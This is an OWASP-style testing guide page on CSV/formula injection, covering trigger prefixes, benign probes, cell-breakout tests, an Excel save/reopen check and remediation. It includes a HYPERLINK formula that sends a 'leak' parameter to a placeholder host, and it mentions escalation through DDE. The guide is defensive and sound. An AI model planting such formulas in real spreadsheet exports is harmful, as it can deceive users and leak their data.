WSTG - Latest

Testing for CSV Injection

ID
WSTG-INPV-21

Summary

CSV Injection (also known as Formula Injection) occurs when an application embeds untrusted, user-controlled input into CSV (or other spreadsheet-compatible) exports and the resulting file is opened in a spreadsheet program (e.g., Microsoft Excel, LibreOffice Calc). Spreadsheet applications may interpret certain cell values as formulas, which can lead to security issues such as user deception (phishing-style workflows), manipulation of spreadsheet output, or data exfiltration. In some environments, formula injection can be escalated to higher impact via spreadsheet “gadgets” and legacy features (e.g., DDE / Dynamic Data Exchange behaviors), potentially reaching command execution on the workstation that opens the file—typically dependent on client configuration and/or user interaction.

A key characteristic of this issue is that the vulnerability often manifests only when the exported file is opened by a user (e.g., an administrator, finance, or support) in a spreadsheet application.

Test Objectives

  • Identify CSV/spreadsheet export features that include untrusted input.
  • Verify whether attacker-controlled values are interpreted as formulas when the export is opened in common spreadsheet applications.
  • Check whether separator/quote injection can move a dangerous prefix to the start of a cell.
  • Validate whether mitigations remain effective in Microsoft Excel after saving and re-opening the CSV.
  • Assess practical impact based on who opens the export and how it is used.

How to Test

Formula-Triggering Prefixes

Cells beginning with the following characters may be interpreted as formulas by spreadsheet software:

  • Equals (=)
  • Plus (+)
  • Minus (-)
  • At (@)
  • Tab (0x09)
  • Carriage return (0x0D)
  • Line feed (0x0A)
  • Full-width (double-byte) variants such as , , , (depending on locale/application behavior)

Important (Excel behavior): Microsoft Excel may remove quotes or escape characters from CSV cells when a file is saved and re-opened. As a result, some commonly suggested mitigations can fail after save/reopen and previously escaped formulas may become active again.

Also note that it is not sufficient to ensure the overall untrusted input does not start with a dangerous character. Attackers may inject separators and quoting to start a new cell, placing the dangerous character at the beginning of a cell.

Identify CSV Export Functionality and Data Sources

Locate features that generate CSV/TSV or “export to spreadsheet” content:

  • Reports (users, transactions, audit logs, tickets)
  • Admin dashboards exporting lists
  • Email attachments generated by the application
  • Scheduled exports / integrations

Identify untrusted data sources that can end up in the export:

  • User profiles (name, email, company)
  • Free-text fields (comments, ticket subjects, notes)
  • Imported/integrated external data (webhooks, CRM sync, partner feeds)

Document which roles can trigger the export and which roles are likely to open it.

Place Benign, Detectable Formula-Like Values into Candidate Fields

Use harmless payloads to detect formula evaluation (avoid payloads that execute commands or perform uncontrolled network access). Test values that begin with each formula-triggering character:

  • =1+1
  • +1+1
  • -1+1
  • @SUM(1,1)
  • =HYPERLINK("http://example.invalid/leak?test=1", "Click Me")

Notes:

  • The HYPERLINK() case is useful to demonstrate realistic impact (deception/phishing-style flows, or potential metadata exposure when a link is clicked/opened). Use a controlled endpoint during testing (e.g., a local listener or an internal test host).
  • Do not use external “real attacker” infrastructure in validation.

Also test control-character and Unicode variants (where input handling allows it):

  • A value that begins with a tab character followed by =1+1 (TAB + =1+1)
  • Full-width prefix variants (e.g., =1+1)

Test Separator and Quote “Cell Breakout” Scenarios

Because CSV is cell-based, test whether you can inject content that starts a new cell and then begins with a dangerous character. This depends on:

  • Field separator (commonly , or ;)
  • Quoting rules and escaping
  • Application-side CSV generation and encoding

Example benign test patterns (adjust separator to the actual export format):

  • A value containing a quote and separator intended to create a new cell, then =1+1
  • A value containing a separator directly (if not quoted by the exporter), then =1+1

Your objective is to see whether the resulting CSV contains any cell whose first character is one of the formula-triggering prefixes. Verify this by inspecting the raw CSV output in a text editor.

Export and Verify in Spreadsheet Applications

  • Export/download the CSV.
  • Open it in at least one spreadsheet application used in the target environment (Excel and/or LibreOffice, etc.).
  • Confirm whether the cell is interpreted as a formula:
    • The spreadsheet displays the computed result (e.g., 2) instead of the literal string (e.g., =1+1), and/or
    • The formula bar shows a formula rather than plain text.

Record:

  • Application name/version (e.g., Microsoft Excel)
  • How the file was opened (double-click vs import wizard)
  • Whether locale settings influenced parsing

Excel Save/Re-open Regression Test (Mitigation Reliability)

If the application claims to escape/quote values:

  • Open the exported CSV in Microsoft Excel.
  • Save the file (e.g., as CSV).
  • Close and re-open it.
  • Re-check whether previously “neutralized” values became active formulas.

This step is critical because Excel may normalize/remove certain escaping/quoting behaviors after save/reopen.

Assess Impact

Assess practical risk based on:

  • Who opens the file (privileged roles vs end users)
  • Whether exports are shared externally
  • Whether spreadsheet values are relied on for decisions (e.g., totals, flags, statuses)
  • Whether formulas could mislead users or trigger spreadsheet behaviors in your environment

Provide a clear reproduction path:

  1. Where input is entered
  2. How export is generated
  3. Which program interprets it as a formula
  4. Evidence (screenshot or description) that evaluation occurs

Higher-Impact Validation (Optional, Strictly Controlled)

Some real-world cases show formula injection escalating beyond simple calculation/deception (e.g., via legacy spreadsheet features such as DDE). This behavior is highly environment-dependent.

Remediation

There is no universal CSV sanitization strategy safe for all spreadsheet applications and downstream consumers. For CSVs intended for human viewing in spreadsheet software, apply a defense-in-depth approach:

  • Ensure no cell begins with formula-triggering characters (=, +, -, @) and relevant control/Unicode variants.
  • Consider per-field sanitization (commonly suggested):
    • Wrap each cell in double quotes
    • Prepend each cell with a single quote
    • Escape double quotes by doubling them
      Note: This may not remain reliable in Microsoft Excel after saving and re-opening.
  • Excel-resistant mitigation (observed behavior):
    • If a cell starts with =, +, -, or @, prefix the content with a tab character (0x09) inside a quoted field (e.g., "\t=1+1").
      Trade-off: The tab becomes part of the underlying data and may affect downstream programmatic imports.

Always validate the chosen mitigation against the spreadsheet applications and workflows in scope.

Tools

  • Intercepting proxy (e.g., Burp Suite, ZAP) to inject controlled values and reproduce the exact export workflow.
  • Spreadsheet software for validation in an isolated environment (e.g., Microsoft Excel, LibreOffice Calc).
  • A safe HTTP listener (local or internal test host) to observe clicks/requests when validating HYPERLINK() behavior.
  • A text editor to inspect the raw CSV and confirm whether any cell begins with a formula-triggering prefix.

References